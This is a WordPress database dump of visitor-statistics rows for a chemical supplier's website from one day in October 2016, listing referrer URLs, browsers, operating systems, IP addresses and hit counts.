INSERT INTO `wp_statistics_visitor` VALUES (3771, '2016-10-13', 'https://www.miller-stephenson.com/sds-access-request-form/', 'MSIE', 'Windows', '11.0', '', '132.3.37.79', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3772, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '36.0.1985.67', '', '192.168.50.80', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3773, '2016-10-13', 'https://www.miller-stephenson.com/my-account/', 'MSIE', 'Windows', '11.0', '', '132.3.37.81', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3774, '2016-10-13', 'https://www.miller-stephenson.com/my-account/', 'MSIE', 'Windows', '11.0', '', '132.3.37.83', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3775, '2016-10-13', 'https://www.miller-stephenson.com', 'Python-urllib', 'Unknown', '2.7', '', '41.89.195.20', '000', 26, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3776, '2016-10-13', 'https://www.miller-stephenson.com/my-account/', 'MSIE', 'Windows', '11.0', '', '132.3.37.78', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3777, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.194', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3778, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '64.73.228.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3779, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '86.123.155.152', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3780, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '184.19.169.170', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3781, '2016-10-13', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3782, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '66.85.239.187', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3783, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3784, '2016-10-13', 'https://www.miller-stephenson.com/opteon-sion-vapor-degreasing-solvent/', 'MSIE', 'Windows', '9.0', '', '204.79.180.170', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3785, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '204.79.180.9', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3786, '2016-10-13', 'https://www.miller-stephenson.com/krytox-product-selection-guide/', 'MSIE', 'Windows', '9.0', '', '204.79.180.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3787, '2016-10-13', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.1', '', '50.250.225.42', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3788, '2016-10-13', 'https://www.google.com/', 'Safari', 'Macintosh', '9.1.1', '', '96.86.189.241', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3789, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '12.208.4.26', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3790, '2016-10-13', 'https://www.bing.com', 'Firefox', 'Windows', '47.0', '', '73.143.69.127', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3791, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwi92_yOotjPAhXmw1QKHeF3CNwQFggwMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fquik-freeze-ms-242n%2F&usg=AFQjCNFVmCGtC1tqzs6rUvFoPwc9KLYe5w&sig2=rXfApIs9mnYijay5Bxm0XQ', 'MSIE', 'Windows', '11.0', '', '10.60.55.79', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3792, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '49.0.2623.112', '', '70.164.106.115', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3793, '2016-10-13', 'https://www.google.com.co/', 'Chrome', 'Windows', '53.0.2785.116', '', '177.255.236.32', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3794, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '169.229.144.185', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3795, '2016-10-13', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '107.77.75.125', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3796, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '209.43.1.202', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3797, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.5', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3798, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.193', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3799, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.0', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3800, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '165.156.25.4', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3801, '2016-10-13', 'https://www.miller-stephenson.com', 'AppleWebKit', 'iPhone', '602.1.50', '', '107.77.75.125', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3802, '2016-10-13', 'https://www.bing.com/search?q=miller-stephenson&src=IE-TopResult&FORM=IETR02&conversationid=&adlt=strict', 'MSIE', 'Windows', '11.0', '', '130.50.200.1', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3803, '2016-10-13', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjPqZW6ptjPAhWCaX4KHbaMAcsYABAA&sig=AOD64_3tYFQe6L9PvORvKGKWAdZmOBhSJg&rct=j&q=&ved=0ahUKEwjFtI-6ptjPAhWDKyYKHWd0D9o4FBDRDAga&adurl=', 'MSIE', 'Windows', '11.0', '', '184.23.239.246', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3804, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '107.170.107.176', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3805, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwj9tOSDptjPAhVHSSYKHRpGCxYQFghnMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fkrytox-vpf-1506%2F&usg=AFQjCNGLjAwO43pyAnmaHHJDRYdooBFtAQ', 'MSIE', 'Windows', '11.0', '', '192.55.2.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3806, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '23.0.1271.26', '', '209.128.119.38', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3807, '2016-10-13', 'https://www.google.com/', 'Chrome', 'iPad', '53.0.2785.109', '', '192.35.35.35', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3808, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '10.224.204.240', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3809, '2016-10-13', 'https://www.miller-stephenson.com/', 'Firefox', 'Linux', '34.0', '', '192.40.93.126', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3810, '2016-10-13', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '192.40.93.126', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3811, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3812, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3813, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '70.39.157.195', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3814, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '10.225.197.50', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3815, '2016-10-13', 'https://www.google.ie/aclk?sa=L&ai=DChcSEwj6-IajqdjPAhWHWYYKHZfcCYIYABAA&sig=AOD64_0NWUvOekkqJlmYMarpPhM-agsqWw&rct=j&frm=1&q=&ved=0ahUKEwim2IOjqdjPAhXLWj4KHaA4AmQQ0QwIHA&adurl=', 'MSIE', 'Windows', '10.0', '', '65.100.52.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3816, '2016-10-13', 'https://www.industrialinfo.com/plant/showPlantReport.jsp?PLANT_ID=1500911', 'Edge', 'Windows', '14.14393', '', '68.84.3.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3817, '2016-10-13', 'https://www.miller-stephenson.com/', 'Safari', 'iPhone', '10.0', '', '180.255.242.5', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3818, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '192.107.246.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3819, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '4.79.123.1', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3820, '2016-10-13', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '24.218.44.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3821, '2016-10-13', 'https://gotomontenegro.net/', 'MSIE', 'Windows', '5.5', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3822, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Macintosh', '49.0.2623.112', '', '45.49.227.11', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3823, '2016-10-13', 'https://viewer.zmags.com/publication/6c6119a2', 'Chrome', 'Windows', '53.0.2785.143', '', '96.92.239.154', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3824, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '64.235.154.109', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3825, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=3&ved=0ahUKEwi259OKrdjPAhWDLSYKHWNBAQQQFggqMAI&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Faeroduster-ms-222n%2F&usg=AFQjCNEzu3QEEZ2Lv4bMlDb0Yu2v32f_0Q&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '11.0', '', '131.59.200.82', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3826, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwjL0MyordjPAhWhhlQKHSszBRsQFggnMAE&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fconformal-coatings%2F&usg=AFQjCNF6BrACSYYrQwxy3XIrHbh4DG7M6A', 'MSIE', 'Windows', '11.0', '', '199.48.185.53', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3827, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=4&ved=0ahUKEwiW7r24rdjPAhXJaD4KHV6GB5YQFggtMAM&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemical-products%2F&usg=AFQjCNE8qBZocicJ0jc8jOvnmnO2NLoR6w', 'MSIE', 'Windows', '11.0', '', '199.46.196.141', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3828, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '143.115.159.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3829, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3830, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '205.254.17.202', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3831, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '50.251.180.12', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3832, '2016-10-13', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '12.118.209.222', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3833, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '67.190.169.58', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3834, '2016-10-13', 'https://www.bing.com/search?q=EPON%20Resin%201031&qs=n&form=QBRE&pq=epon%20resin%201031&sc=6-15&sp=-1&sk=&cvid=83F417E00D464A638613A73FC2EB0428', 'MSIE', 'Windows', '11.0', '', '40.140.26.106', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3835, '2016-10-13', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '198.52.59.6', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3836, '2016-10-13', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '100.34.13.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3837, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '96.4.47.113', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3838, '2016-10-13', '(null)', 'Firefox', 'Windows', '33.0', '', '162.243.5.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3839, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3840, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '132.3.45.78', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3841, '2016-10-13', 'https://www.miller-stephenson.com/notify-SubZero?aHR0cDovL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb20vcHJvZHVjdC9xdWlrLWZyZWV6ZS1hbnRpc3RhdGljLw==;I2VT/9ArA5L+7EVAr8I0Dt8L63evXPptpV7grbPfGB0=', 'MSIE', 'Windows', '11.0', '', '132.3.45.81', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3842, '2016-10-13', 'https://www.miller-stephenson.com/product/quik-freeze-antistatic/', 'MSIE', 'Windows', '11.0', '', '132.3.45.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3843, '2016-10-13', 'https://www.miller-stephenson.com/product/quik-freeze-antistatic/', 'MSIE', 'Windows', '11.0', '', '132.3.45.80', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3844, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '96.82.224.185', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3845, '2016-10-13', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '53.0.2785.116', '', '64.183.73.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3846, '2016-10-13', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjc6-zMtdjPAhWFYH4KHZLrCJ4YABAA&sig=AOD64_1Ch6LuzS0LpctT-WVzOlp4u1Dr_g&rct=j&q=&ved=0ahUKEwjlp-fMtdjPAhWFKiYKHWrgBb4Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '75.147.17.209', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3847, '2016-10-13', 'https://r.search.yahoo.com/_ylt=Awr5.owI1P9XOq8AsF9XNyoA;_ylu=X3oDMTEyOGliMzdtBGNvbG8DYmYxBHBvcwMzBHZ0aWQDQjE4NzlfMQRzZWMDc3I-/RV=2/RE=1476412553/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fproduct%2fepon-813%2f/RK=0/RS=DeL5yTqoBlgxMPFF2uw.VhWdY04-', 'MSIE', 'Windows', '11.0', '', '129.82.233.39', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3848, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Macintosh', '53.0.2785.143', '', '76.90.122.91', '000', 36, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3849, '2016-10-13', 'https://xn----7sbbagbq7bd5aheftfllo4m.xn--p1ai/', 'MSIE', 'Windows', '5.5', '', '46.118.118.216', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3850, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.48.191', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3851, '2016-10-13', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '79.116.29.57', '000', 54, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3852, '2016-10-13', 'https://www.google.com/aclk?sa=L&ai=DChcSEwikjKrqt9jPAhWHJIYKHYWODAUYABAA&sig=AOD64_3zW0Y9zwmLF6Ez5pKmcQF82dYzAg&rct=j&q=&ved=0ahUKEwjYu6bqt9jPAhXEQD4KHf5rCj0Q0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '198.38.63.164', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3853, '2016-10-13', 'https://www.bing.com/search?q=PTFE%20coating%20for%20guide%20wires&qs=n&form=QBRE&pq=ptfe%20coating%20for%20guide%20wires&sc=3-27&sp=-1&sk=&cvid=711C58BBEF7741359972B54ECA0478E2', 'MSIE', 'Windows', '11.0', '', '138.103.17.23', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3854, '2016-10-13', 'https://www.bing.com/search?q=krytox+nrt+8900&qs=n&form=QBLH&pq=krytox+nrt+8&sc=0-12&sp=-1&sk=&ghc=1&cvid=B36A3171D2514A3C8A893C9BF2727768', 'Edge', 'Windows', '13.10586', '', '199.116.246.137', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3855, '2016-10-13', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '50.249.115.201', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3856, '2016-10-13', 'https://www.google.com/aclk?sa=L&ai=DChcSEwibzsWlutjPAhVUW4YKHUbzC2wYABAA&sig=AOD64_3YhybSzfs7xnc48yZxO78oIJe9tg&rct=j&q=&ved=0ahUKEwifgcKlutjPAhUHFT4KHcFjCFoQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '67.84.248.49', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3857, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '600.1.4', '', '68.52.64.65', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3858, '2016-10-13', 'https://www.google.co.uk/', 'Chrome', 'iPhone', '53.0.2785.109', '', '86.137.87.115', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3859, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.235.209.180', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3860, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&sqi=2&ved=0ahUKEwjCjMzov9jPAhXJ5SYKHYC5DacQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.eWE', 'MSIE', 'Windows', '11.0', '', '12.32.216.2', '000', 17, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3861, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '158.106.67.214', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3862, '2016-10-13', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjU6t3hwdjPAhWUXn4KHRcMBpQYABAA&sig=AOD64_2_fe7L0Ey3xTRZwjA6Hby4QUjrHA&rct=j&q=&ved=0ahUKEwiMjdjhwdjPAhVC5iYKHYSSBZAQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '12.152.193.133', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3863, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '173.14.39.209', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3864, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '173.9.30.137', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3865, '2016-10-13', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '71.12.109.211', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3866, '2016-10-13', 'https://www.google.gr/', 'Firefox', 'Windows', '49.0', '', '79.131.252.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3867, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwig0bHfxNjPAhXCSSYKHfVLCnwQFghNMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fkrytox%2F&usg=AFQjCNGn7PFDgABBgpzqq7KdESkbBtph0Q&sig2=wYw84Kcx3FVx9N3oi6jv2A', 'MSIE', 'Windows', '11.0', '', '132.26.121.32', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3868, '2016-10-13', 'https://www.bing.com/', 'MSIE', 'Windows', '11.0', '', '166.20.224.12', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3869, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwis_tmDxtjPAhVHlFQKHYTgAH4QFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&bvm=bv.135475266,d.cWw', 'MSIE', 'Windows', '11.0', '', '165.156.24.4', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3870, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '71.13.197.114', '000', 64, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3871, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '74.7.225.195', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3872, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '97.86.80.90', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3873, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '168.178.193.6', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3874, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '199.89.130.52', '000', 21, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3875, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Android', '45.0.2454.94', '', '174.199.34.95', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3876, '2016-10-13', 'https://mmr.mschem.com/miller/pdf/MS-115.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '157.130.5.186', '000', 9, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3877, '2016-10-13', 'https://www.bing.com/search?q=stripping+agents+for+epoxy+paint&form=IE11TR&src=IE11TR&pc=EUPP_DCJB', 'MSIE', 'Windows', '11.0', '', '12.15.177.2', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3878, '2016-10-13', 'https://www.google.com/', 'Safari', 'Macintosh', '10.0', '', '128.227.122.111', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3879, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.158', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3880, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.198.226.18', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3881, '2016-10-13', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '216.227.251.66', '000', 29, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3882, '2016-10-13', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiBwcKMz9jPAhVnlFQKHftFC9YQFggdMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&sig2=DexJfBJcVvCBJ6lrs9uzBw&bvm=bv.135475266,d.cGw', 'MSIE', 'Windows', '11.0', '', '12.216.166.131', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3883, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.53.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3884, '2016-10-13', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1208.5uXpzxIF2MwspMv6xRGkOLjUIar88EgHdQC1EkWdWVtgN6P7m5p1RdC-SnVT5OKi.8e62442b64065f88d8bfdc3412f6271c540a393a&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YM1sNxN_KHOPADPyHdOKa1Y&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhXQkktSlF5d0NvOXdBQ1E3VkJaMGdpRUotb0JwdlYxNDRaT2xrMko5MkJOSndIY1lNWnhLbndsN2g5WTRrZXlVX21EZFRCZUFWOElvQnQtcjF6VXJRYWtDREZDallKSVlpaHRZWUQtWlVDYQ&b64e=2&sign=4dac36d51d98d66140cd972eba860416&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96FJFEyBkntQ01raAws5w3EYalIj1vL4Xlk1_5SpovrlP_nqret9OWa7fS1ktMX2Rjw27iueMHEBnkI7W6u19fJ3_7MI6Ko05nBysduZImOHAEzI8ZSq4Zum55Gqc49a0A9&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXEfKO1imoOE1-O9ppuXDrTz-GRhHioUejkxGzzGNc2ZQHedBXbnRlMatud8tCy6JfOfvi9f1MWd8al8tMCfoZa6J-EpCslnuE&l10n=ru&cts=1476390828957&mc=6.77510558418', 'MSIE', 'Windows', '10.0', '', '37.110.39.138', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3885, '2016-10-13', 'https://mmk.mschem.com/miller/pdf/Heloxy.pdf', 'Chrome', 'Windows', '53.0.2785.143', '', '207.238.166.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3886, '2016-10-13', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '73.192.138.107', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3887, '2016-10-13', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '53.0.2785.143', '', '192.168.10.68', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3888, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '76.79.123.130', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3889, '2016-10-13', 'https://www.google.de/', 'Firefox', 'Windows', '49.0', '', '35.87.45.2', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3890, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 4, 0); 
